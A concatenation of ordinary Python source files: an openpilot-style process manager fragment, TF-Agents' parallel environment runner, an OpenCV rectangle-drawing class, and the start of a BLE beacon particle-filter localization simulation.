# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p, build=False):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "SConscript")) and build:
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["scons", "u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# clean and retry if the build failed
cloudlog.warning("building %s failed, cleaning and retrying" % (proc, ))
subprocess.check_call(["scons", "-u", "-c", "."], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["scons", "-u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
os.system("date >> /data/unkillable_reboot")
os.sync()
HARDWARE.reboot()
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if EON:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
if name not in running or name not in managed_processes or \
running[name].exitcode is not None:
return
cloudlog.info(f"sending signal {sig} to {name}")
os.kill(running[name].pid, sig)
# ****************** run loop ******************
def manager_init():
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set dongle id
reg_res = register()
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
os.environ['DONGLE_ID'] = dongle_id
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if EON:
os.chmod(BASEDIR, 0o755)
os.chmod("/dev/shm", 0o777)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
shutdownd = Process(name="shutdownd", target=launcher, args=("selfdrive.shutdownd",))
shutdownd.start()
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if EON:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
started_prev = False
logger_dead = False
params = Params()
thermal_sock = messaging.sub_sock('thermal')
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
driver_view = params.get("IsDriverViewEnabled") == b"1"
# TODO: refactor how manager manages processes
for p in reversed(car_started_processes):
if p not in driver_view_processes or not driver_view:
kill_managed_process(p)
for p in driver_view_processes:
if driver_view:
start_managed_process(p)
else:
kill_managed_process(p)
# trigger an update after going offroad
if started_prev:
os.sync()
send_managed_process_signal("updated", signal.SIGHUP)
started_prev = msg.thermal.started
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare():
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Spinner has to start from 70 here
total = 100.0 if PREBUILT else 30.0
for i, p in enumerate(managed_processes):
perc = (100.0 - total) + total * (i + 1) / len(managed_processes)
spinner.update(str(int(perc)))
prepare_managed_process(p)
def main():
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "1"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("LaneChangeEnabled", "1"),
("LongControlEnabled", "0"),
("MadModeEnabled", "1"),
("AutoLaneChangeEnabled", "0"),
("IsDriverViewEnabled", "0"),
# scc smoother
("SccSmootherState", "0"),
("SccSmootherEnabled", "0"),
("SccSmootherSlowOnCurves", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if EON:
update_apks()
manager_init()
manager_prepare()
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
spinner.close()
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
parallel_py_environment.py
|
# coding=utf-8
# Copyright 2018 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Runs multiple environments in parallel processes and steps them in batch."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import sys
import traceback
from absl import logging
import cloudpickle
import gin
import numpy as np
import tensorflow as tf # pylint: disable=g-explicit-tensorflow-version-import
from tf_agents.environments import py_environment
from tf_agents.system import multiprocessing
from tf_agents.utils import nest_utils
# Worker polling period in seconds.
_POLLING_PERIOD = 0.1
@gin.configurable
class ParallelPyEnvironment(py_environment.PyEnvironment):
"""Batch together environments and simulate them in external processes.
The environments are created in external processes by calling the provided
callables. This can be an environment class, or a function creating the
environment and potentially wrapping it. The returned environment should not
access global variables.
"""
def __init__(self, env_constructors, start_serially=True, blocking=False,
flatten=False):
"""Batch together environments and simulate them in external processes.
The environments can be different but must use the same action and
observation specs.
Args:
env_constructors: List of callables that create environments.
start_serially: Whether to start environments serially or in parallel.
blocking: Whether to step environments one after another.
flatten: Boolean, whether to use flatten action and time_steps during
communication to reduce overhead.
Raises:
ValueError: If the action or observation specs don't match.
"""
super(ParallelPyEnvironment, self).__init__()
self._envs = [ProcessPyEnvironment(ctor, flatten=flatten)
for ctor in env_constructors]
self._num_envs = len(env_constructors)
self._blocking = blocking
self._start_serially = start_serially
self.start()
self._action_spec = self._envs[0].action_spec()
self._observation_spec = self._envs[0].observation_spec()
self._time_step_spec = self._envs[0].time_step_spec()
self._parallel_execution = True
if any(env.action_spec() != self._action_spec for env in self._envs):
raise ValueError('All environments must have the same action spec.')
if any(env.time_step_spec() != self._time_step_spec for env in self._envs):
raise ValueError('All environments must have the same time_step_spec.')
self._flatten = flatten
def start(self):
logging.info('Spawning all processes.')
for env in self._envs:
env.start(wait_to_start=self._start_serially)
if not self._start_serially:
logging.info('Waiting for all processes to start.')
for env in self._envs:
env.wait_start()
logging.info('All processes started.')
@property
def batched(self):
return True
@property
def batch_size(self):
return self._num_envs
def observation_spec(self):
return self._observation_spec
def action_spec(self):
return self._action_spec
def time_step_spec(self):
return self._time_step_spec
def _reset(self):
"""Reset all environments and combine the resulting observation.
Returns:
Time step with batch dimension.
"""
time_steps = [env.reset(self._blocking) for env in self._envs]
if not self._blocking:
time_steps = [promise() for promise in time_steps]
return self._stack_time_steps(time_steps)
def _step(self, actions):
"""Forward a batch of actions to the wrapped environments.
Args:
actions: Batched action, possibly nested, to apply to the environment.
Raises:
ValueError: Invalid actions.
Returns:
Batch of observations, rewards, and done flags.
"""
time_steps = [
env.step(action, self._blocking)
for env, action in zip(self._envs, self._unstack_actions(actions))]
# When blocking is False we get promises that need to be called.
if not self._blocking:
time_steps = [promise() for promise in time_steps]
return self._stack_time_steps(time_steps)
def close(self):
"""Close all external process."""
logging.info('Closing all processes.')
for env in self._envs:
env.close()
logging.info('All processes closed.')
def _stack_time_steps(self, time_steps):
"""Given a list of TimeStep, combine to one with a batch dimension."""
if self._flatten:
return nest_utils.fast_map_structure_flatten(
lambda *arrays: np.stack(arrays), self._time_step_spec, *time_steps)
else:
return nest_utils.fast_map_structure(
lambda *arrays: np.stack(arrays), *time_steps)
def _unstack_actions(self, batched_actions):
"""Returns a list of actions from potentially nested batch of actions."""
flattened_actions = tf.nest.flatten(batched_actions)
if self._flatten:
unstacked_actions = zip(*flattened_actions)
else:
unstacked_actions = [
tf.nest.pack_sequence_as(batched_actions, actions)
for actions in zip(*flattened_actions)
]
return unstacked_actions
def seed(self, seeds):
"""Seeds the parallel environments."""
if len(seeds) != len(self._envs):
raise ValueError(
'Number of seeds should match the number of parallel_envs.')
promises = [env.call('seed', seed) for seed, env in zip(seeds, self._envs)]
# Block until all envs are seeded.
return [promise() for promise in promises]
class ProcessPyEnvironment(object):
"""Step a single env in a separate process for lock free paralellism."""
# Message types for communication via the pipe.
_READY = 1
_ACCESS = 2
_CALL = 3
_RESULT = 4
_EXCEPTION = 5
_CLOSE = 6
def __init__(self, env_constructor, flatten=False):
"""Step environment in a separate process for lock free paralellism.
The environment is created in an external process by calling the provided
callable. This can be an environment class, or a function creating the
environment and potentially wrapping it. The returned environment should
not access global variables.
Args:
env_constructor: Callable that creates and returns a Python environment.
flatten: Boolean, whether to assume flattened actions and time_steps
during communication to avoid overhead.
Attributes:
observation_spec: The cached observation spec of the environment.
action_spec: The cached action spec of the environment.
time_step_spec: The cached time step spec of the environment.
"""
# NOTE(ebrevdo): multiprocessing uses the standard py3 pickler which does
# not support anonymous lambdas. Folks usually pass anonymous lambdas as
# env constructors. Here we work around this by manually pickling
# the constructor using cloudpickle; which supports these. In the
# new process, we'll unpickle this constructor and run it.
self._pickled_env_constructor = cloudpickle.dumps(env_constructor)
self._flatten = flatten
self._observation_spec = None
self._action_spec = None
self._time_step_spec = None
def start(self, wait_to_start=True):
"""Start the process.
Args:
wait_to_start: Whether the call should wait for an env initialization.
"""
mp_context = multiprocessing.get_context()
self._conn, conn = mp_context.Pipe()
self._process = mp_context.Process(target=self._worker, args=(conn,))
atexit.register(self.close)
self._process.start()
if wait_to_start:
self.wait_start()
def wait_start(self):
"""Wait for the started process to finish initialization."""
result = self._conn.recv()
if isinstance(result, Exception):
self._conn.close()
self._process.join(5)
raise result
assert result == self._READY, result
def observation_spec(self):
if not self._observation_spec:
self._observation_spec = self.call('observation_spec')()
return self._observation_spec
def action_spec(self):
if not self._action_spec:
self._action_spec = self.call('action_spec')()
return self._action_spec
def time_step_spec(self):
if not self._time_step_spec:
self._time_step_spec = self.call('time_step_spec')()
return self._time_step_spec
def __getattr__(self, name):
"""Request an attribute from the environment.
Note that this involves communication with the external process, so it can
be slow.
This method is only called if the attribute is not found in the dictionary
of `ParallelPyEnvironment`'s definition.
Args:
name: Attribute to access.
Returns:
Value of the attribute.
"""
# Private properties are always accessed on this object, not in the
# wrapped object in another process. This includes properties used
# for pickling (incl. __getstate__, __setstate__, _conn, _ACCESS, _receive),
# as well as private properties and methods created and used by subclasses
# of this class. Allowing arbitrary private attributes to be requested
# from the other process can lead to deadlocks.
if name.startswith('_'):
return super(ProcessPyEnvironment, self).__getattribute__(name)
# All other requests get sent to the worker.
self._conn.send((self._ACCESS, name))
return self._receive()
def call(self, name, *args, **kwargs):
"""Asynchronously call a method of the external environment.
Args:
name: Name of the method to call.
*args: Positional arguments to forward to the method.
**kwargs: Keyword arguments to forward to the method.
Returns:
The attribute.
"""
payload = name, args, kwargs
self._conn.send((self._CALL, payload))
return self._receive
def access(self, name):
"""Access an attribute of the external environment.
This method blocks.
Args:
name: Name of the attribute to access.
Returns:
The attribute value.
"""
self._conn.send((self._ACCESS, name))
return self._receive()
def close(self):
"""Send a close message to the external process and join it."""
try:
self._conn.send((self._CLOSE, None))
self._conn.close()
except IOError:
# The connection was already closed.
pass
if self._process.is_alive():
self._process.join(5)
def step(self, action, blocking=True):
"""Step the environment.
Args:
action: The action to apply to the environment.
blocking: Whether to wait for the result.
Returns:
time step when blocking, otherwise callable that returns the time step.
"""
promise = self.call('step', action)
if blocking:
return promise()
else:
return promise
def reset(self, blocking=True):
"""Reset the environment.
Args:
blocking: Whether to wait for the result.
Returns:
New observation when blocking, otherwise callable that returns the new
observation.
"""
promise = self.call('reset')
if blocking:
return promise()
else:
return promise
def _receive(self):
"""Wait for a message from the worker process and return its payload.
Raises:
Exception: An exception was raised inside the worker process.
KeyError: The reveived message is of an unknown type.
Returns:
Payload object of the message.
"""
message, payload = self._conn.recv()
# Re-raise exceptions in the main process.
if message == self._EXCEPTION:
stacktrace = payload
raise Exception(stacktrace)
if message == self._RESULT:
return payload
self.close()
raise KeyError('Received message of unexpected type {}'.format(message))
def _worker(self, conn):
"""The process waits for actions and sends back environment results.
Args:
conn: Connection for communication to the main process.
Raises:
KeyError: When receiving a message of unknown type.
"""
try:
env = cloudpickle.loads(self._pickled_env_constructor)()
action_spec = env.action_spec()
conn.send(self._READY) # Ready.
while True:
try:
# Only block for short times to have keyboard exceptions be raised.
if not conn.poll(_POLLING_PERIOD):
continue
message, payload = conn.recv()
except (EOFError, KeyboardInterrupt):
break
if message == self._ACCESS:
name = payload
result = getattr(env, name)
conn.send((self._RESULT, result))
continue
if message == self._CALL:
name, args, kwargs = payload
if self._flatten and name == 'step':
args = [tf.nest.pack_sequence_as(action_spec, args[0])]
result = getattr(env, name)(*args, **kwargs)
if self._flatten and name in ['step', 'reset']:
result = tf.nest.flatten(result)
conn.send((self._RESULT, result))
continue
if message == self._CLOSE:
assert payload is None
env.close()
break
raise KeyError('Received message of unknown type {}'.format(message))
except Exception: # pylint: disable=broad-except
etype, evalue, tb = sys.exc_info()
stacktrace = ''.join(traceback.format_exception(etype, evalue, tb))
message = 'Error in environment process: {}'.format(stacktrace)
logging.error(message)
conn.send((self._EXCEPTION, stacktrace))
finally:
conn.close()
|
CaptureAreaDrawer.py
|
import copy
import threading
import cv2
import numpy
import numpy as np
from src import RectCoordinates
class CaptureAreaDrawer:
OUTLINE_COLOR = (0, 255, 0)
stopped: bool = False
__source_frame: numpy.ndarray
__frame: numpy.ndarray
__rect: RectCoordinates
__thread: threading.Thread
__event_handler: threading.Event = threading.Event()
__write_lock: threading.Lock = threading.Lock()
def __init__(self, source_frame: np.ndarray, rect: RectCoordinates):
self.__source_frame = source_frame
self.__rect = rect
def start(self) -> 'CaptureAreaDrawer':
self.__frame = self.create_retangled_frame(self.OUTLINE_COLOR, self.__rect, self.__source_frame.copy())
self.__thread = threading.Thread(target=self.draw, args=())
self.__thread.start()
return self
def draw(self):
while not self.stopped and self.__event_handler.wait(100):
with self.__write_lock:
rectangled_frame = self.__source_frame.copy()
rect = copy.copy(self.__rect)
self.__frame = self.create_retangled_frame(self.OUTLINE_COLOR, rect, rectangled_frame)
def create_retangled_frame(self, color, rect, rectangled_frame):
cv2.rectangle(rectangled_frame, rect.get_start_xy(), rect.get_end_xy(), color, 2)
return rectangled_frame
def stop(self):
self.stopped = True
self.__thread.join()
def update_source_frame(self, source_frame):
with self.__write_lock:
self.__source_frame = source_frame
self.__event_handler.set()
def update_rectangle(self, rect):
with self.__write_lock:
self.__rect = rect
self.__event_handler.set()
def read(self):
return self.__frame
|
by_multiplePOI.py
|
#! /usr/bin/python
from __future__ import division
import numpy as np
import math # for math.ceil
import matplotlib.pyplot as plt
from numpy.linalg import norm
from numpy.random import uniform
from scipy.stats import multivariate_normal # for bivariate gaussian -> brownian motion ( normal with mu x(t-1), and variance sigma )
from filterpy.monte_carlo import systematic_resample, multinomial_resample , residual_resample, stratified_resample
from scipy.optimize import minimize
from scipy.optimize import fmin_tnc
from matplotlib.patches import Ellipse, Rectangle, Circle
import matplotlib.transforms as transforms
from matplotlib import animation
from matplotlib import collections
from numpy.random import seed
from multiprocessing import Process
from collections import deque as col_deque # for the sliding windows
import copy
#from matplotlib.font_manager import FontProperties
import time
from sklearn.cluster import KMeans
from shapely.geometry import LineString
from shapely.geometry import Point
from shapely.geometry import Polygon
#from shapely.geometry.point import Point
import shapely.affinity
import matplotlib.ticker as mticker
from scipy.interpolate import griddata
from scipy.interpolate import interp2d
from signal import signal, SIGTERM
from matplotlib import rc
import sys
import os
rc('text', usetex=True)
# object of interest , all variables used for single object tracking will be used as a member variable
# and all the function will be used as a class function instead of global functions
sizeIncrementRatio=1000/762 # sizeIncrementRatio_small_over_large -> kagida basarken small haritalarin boyutu buyuk oldugundan daha cok resize ediliyor, bunu handle etmeliyiz.
currPersonNumber=0
stopIteration=5 # it is 5 for the 1st, it is going to be different for different peo
sensitivityOfResult=0.1
maxSignalError=5
numberOfBlocks=2
#blockWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) / 8
#blockLength=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) / 12
blockWidth=0.5 # 0.7 = 70cm for example
blockLength=2.5
pastCoeff=0.2
totalNumberOfPeople=6
MinWaitingForPerson=0 # min waiting time between each person
MaxWaitingForPerson=20
totalIterNo=10000
NumberOfParticles=300
xdims=(0,5) # our office's coordinates
ydims=(0,3)
#xdims=(0,3)
#ydims=(0,2)
movingLimit=1.0
minValidSignal=-90
minSignalValue=-100
numberOfReceivers=3
strongSignalDistance=5
#movingTendency=np.array([0.5,0.2])
movingTendency=np.array([0.0,0.0])
prevMotionRepeatProb=0.75
numberOfRooms=0
#roomWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) / 8
#roomLength=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) / 6
roomWidth=2
roomLength=5
# roomPositions = [ [6.75,7] ]
OOIWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) /20 * sizeIncrementRatio# beacon representing the person is drawn as circle in the map(ellipse indeed, but looks like a circle due to adjustments)
OOIHeight=OOIWidth
particleWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) /400 * sizeIncrementRatio
particleHeight=particleWidth
# these blocking material positions will be added in main function
# make receivers in square shape
receiverWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) /30 * sizeIncrementRatio
receiverLength=receiverWidth
receiverPositions=[]
blockPositions=[]
roomPositions=[]
blockMaterials=[]
roomMaterials=[]
WallRoomRatio=0.125# 0/125: rooms have only 1/8 of them as the 2 walls that we intersect(so inner area is 14 wall width totaling 16 wall width area size)
# distance is already calculated for our RSSI before taking material things into account, so no need to think about empty area in the rooms
roomWallWidth=roomWidth * WallRoomRatio # express line witdht in terms of data points instead of axis
# since linewidth expand line width towards inside and outside both in equal amount(so roomWallWidth/2 distance check from rectangle boundary is enouhg for collision check)
materials=['concrete']
#materials = ['aluminum','iron', 'concrete', 'brick', 'glass'] # blockMaterials and roomMaterials elements are chosen from this list
materialColors = {'aluminum':'silver','iron':'black', 'concrete':'gray', 'brick':'red', 'glass':'aqua'} # https://matplotlib.org/users/colors.html
#material_SignalDisturbance_Coefficients={'aluminum':10.0, 'iron':9.0, 'concrete':8.0, 'brick':7.0, 'glass':3.0 } # signal attenuation per 1 meter in terms of dBm
material_SignalDisturbance_Coefficients={'aluminum':20.0, 'iron':18.0, 'concrete':16.0, 'brick':14.0, 'glass':6.0 } # signal attenuation per 1 meter in terms of dBm
smallestFigureSideInInch=6 # smallest side will be 6 inch
TX_Power=0
rssiAtOne=TX_Power-65
fingerPrintingBeaconPositions=np.array( [ [0.25,2.25], [5, 5 ], [12, 8 ], [11.5, 3 ] ] )
#fingerPrintingBeaconPositions=np.array( [ [0,0], [5, 5 ], [12, 8 ], [13.5,13 ] ] )
fingerPrintingSignalStrengthBeaconsToReceivers=np.array([ [ -76, -73, -86, -82 ], [ -84, -81, -67, -72 ], [ -83, -77, -85, -89 ] ]) # 4 Beacon to each of the 3 receivers
InterpolatedMapForReceivers=None
interpolatedSignalStrenghForAllPositions_forEachReceiver={} # make it a dictionary where the key is 2d position
useFingerPrinting=True # use fingerprinting instead of multi-laterate , choose the 1st nearest valued position
safetyOffset = 10**-10
OverallError=0
numberOfNotFounds=0
#predefinedPos=np.array([ [0.1,0], [0.2,1], [0.22,1.7], [0.3,2.7], [1.5,2.6], [2,1.7], [2.5,0.2], [3.5,0.15] ])
predefinedPos=np.array([ [0.1,0], [0.2,1], [0.22,1.7], [0.3,2.7], [1.5,2.6], [2,1.7], [2.5,0.2], [3.5,0.15] ])
def main():
global receiverPositions, blockPositions, roomPositions, blockMaterials, roomMaterials, roomWallWidth
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
receiverPositions=getReceiverPositionsToInstall(xdims,ydims,numberOfReceivers)
blockPositions=getBlockPositionsToInstall(xdims=xdims,ydims=ydims,numberOfBlocks=numberOfBlocks) # install blocks without overlapping
roomPositions=getRoomPositionsToInstall(xdims=xdims,ydims=ydims,numberOfRooms=numberOfRooms,roomBoundary=roomWallWidth/2)
blockPositions=[[0.7,1.25],[3,1.75]]
# these coeffients represent different
blockMaterials=np.random.choice(materials, numberOfBlocks)
roomMaterials=np.random.choice(materials, numberOfRooms)
#interpolateFingerPrintingResult()
#print "receiverPositions are: "
#for receiverPosition in receiverPositions:
#print receiverPosition
AllProcesses=[]
for i in range(totalNumberOfPeople):
AllProcesses.append([i,Process(target=processFunction,args=(i,) )] )
for j, proc in AllProcesses:
if j==0:
sleepAmount=0
elif j==1:
sleepAmount=6
elif j==2:
sleepAmount=0
elif j==3:
sleepAmount=16
elif j==4:
sleepAmount=12
elif j==5:
sleepAmount=14
else:
print "MORE Process than expected"
sys.exit(1)
print "sleepAmount is: " + str(sleepAmount)
#time.sleep(sleepAmount*2)
#time.sleep(10)
proc.start()
#seed(100)
#sleepAmount=np.random.uniform(low=MinWaitingForPerson,high=MaxWaitingForPerson)
#time.sleep(17*2+4)
# for j, proc in AllProcesses:
#proc.terminate()
# proc.terminate()
def processFunction(i):
global currPersonNumber
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
seed(i)
currPersonNumber=i+1
macID=generateRandomMACID()
#fig=plt.figure(figsize=(xdims[1]-xdims[0],ydims[1]-ydims[0]))
if (xdims[1]-xdims[0] ) < ydims[1]-ydims[0]:
fig=plt.figure(figsize=( smallestFigureSideInInch, (ydims[1]-ydims[0])/(xdims[1]-xdims[0]) * smallestFigureSideInInch ) )
else:
fig=plt.figure(figsize=( (xdims[1]-xdims[0])/(ydims[1]-ydims[0]) * smallestFigureSideInInch, smallestFigureSideInInch ) )
fig.canvas.set_window_title(macID)
# kucuk olan kisim her zaman 3 inch falan olsun, ama aspect ratio hep xdims[1]-xdims[0] / ydims[1]-ydims[0] kalsin
#fig.set_figweight=12
#fig.set_figheight=3
ax=fig.add_subplot(111)
while True:
initialPositionOfThePerson=np.random.uniform(low=[xmin,ymin], high=[xmax,ymax], size=(2))
#print "TMP initialPositionOfThePerson for " + str(macID) + " is: " + str(initialPositionOfThePerson)
isCollision=False
for blockPosition in blockPositions:
#if checkCircleCollision_WithRectangle(tmpBeaconPos,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength):
if checkEllipseRectangleIntersection(initialPositionOfThePerson,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength):
isCollision=True
break
if not isCollision:
for roomPosition in roomPositions:
#if checkCircleCollision_WithRectangle(tmpBeaconPos,beaconRadius,roomPosition,roomWidth,roomLength):
#print "room wall width is: " + str(roomWallWidth)
# use roomWallWidth/2, since linewidth expands toward outside and inside (for roomWallWidth, expands roomWallWidth/2 towards inside and roomWallWidth/2 towards outside)
if checkEllipseRectangleIntersection(initialPositionOfThePerson,OOIWidth,OOIHeight,roomPosition,roomWidth,roomLength,boundaryForRect=roomWallWidth/2):
isCollision=True
break
if not isCollision:
break
#initialPositionOfThePerson=np.array([0.3,0])
initialPositionOfThePerson=predefinedPos[0]
#print "the initialPositionOfThePerson for " + str(macID) + " is: " + str(initialPositionOfThePerson)
currPerson = OOI(xdims,ydims,NumberOfParticles,receiverPositions,initialPositionOfThePerson)
# must assign FuncAnimation to a variable, otherwise it does not work
ani = animation.FuncAnimation(fig, animate, fargs=[ax, macID, currPerson, NumberOfParticles,xdims,ydims,maxSignalError,movingLimit,pastCoeff,
minValidSignal,minSignalValue,numberOfReceivers,sensitivityOfResult,
strongSignalDistance,movingTendency],interval=1000, frames=totalIterNo, repeat=False, init_func=animate_dummy_init)
#plt.axes().set_aspect('equal', 'datalim')
#plt.axis('scaled')
plt.tight_layout()
plt.show()
def checkIfCoordinateIsInMap(coords,width,height):
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
return coords[0]-width/2 >= xmin and coords[0]+width/2 <= xmax and coords[1]-height/2 >= ymin and coords[1]+height/2 <= ymax
def linewidth_from_data_units(linewidth, axis):
"""
Convert a linewidth in data units to linewidth in points.
Parameters
----------
linewidth: float
Linewidth in data units of the respective reference-axis
axis: matplotlib axis
The axis which is used to extract the relevant transformation
data (data limits and size must not change afterwards)
reference: string
The axis that is taken as a reference for the data width.
Possible values: 'x' and 'y'. Defaults to 'y'.
Returns
-------
linewidth: float
Linewidth in points
"""
fig = axis.get_figure()
xlength = fig.bbox_inches.width * axis.get_position().width
xvalue_range = np.diff(axis.get_xlim())
#print "xlength: " + str(xlength)
#print "xvalue_range: " + str(xvalue_range)
ylength = fig.bbox_inches.height * axis.get_position().height
yvalue_range = np.diff(axis.get_ylim())
#print "ylength: " + str(ylength)
#print "yvalue_range: " + str(yvalue_range)
# Convert length to points
xlength *= 72
ylength *= 72
# Scale linewidth to value range
xresult=linewidth * (xlength / xvalue_range)
yresult=linewidth * (ylength / yvalue_range)
#print "xresult: " + str(xresult)
#print "yresult: " + str(yresult)
return max(xresult,yresult)
class OOI:
def __init__(self,xdims,ydims,NumberOfParticles,receiverPositions,initialPositionOfThePerson):
# INITIALIZATION STEP, distribute particles on the map
self.particles = create_uniform_particles(xdims,ydims , NumberOfParticles)
self.weights = np.ones(NumberOfParticles) / NumberOfParticles
#beacon_pos = np.array([0.0, 0.0])
#self.beacon_pos = np.array( [(xdims[1]-xdims[0])/4.0,(ydims[1]-ydims[0])/4.0] )
self.beacon_pos=initialPositionOfThePerson
self.prev_walkingNoise=None
self.x_prev = np.zeros((NumberOfParticles, 2)) # prev particles
self.x_pp = np.zeros((NumberOfParticles, 2)) # prev of prev particle
self.receiverPositions = receiverPositions
self.RSSIofReceivers=[] # what are the RSSI valus for this person on our receiver devices
self.UnprocessedRSSIofReceivers=[] # BLE fingerprinting needs the base value(ham deger) to compare its results with the received(but still weaking due to should be simualated since it is real)
self.distToReceivers=[]
self.prevCovMatrix=None
self.mu=None
self.max_weighted_particle=None
self.slidingWindows=[col_deque([]) for i in range(len(receiverPositions) ) ]
# circle rectangle detection yapmaliyim aslinda:
# http://jeffreythompson.org/collision-detection/circle-rect.php
#ensure person does not go out the map
# movingLimit is the max step lenght of the person, let's say 1 meter per time step for example
# movingTendency is the tendency for our the person to move in a direction
def move_beacon_in_map(self,xdims, ydims,movingLimit,movingTendency=np.array([0,0]),roomBoundary=0 ):
# hepsini dolassin bloklarin, hicbiri ile kesismiyorsa hareket etsin
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
xlow = np.maximum(xmin,self.beacon_pos[0]-movingLimit)-self.beacon_pos[0]
xhigh =np.minimum(xmax, self.beacon_pos[0]+movingLimit)-self.beacon_pos[0]
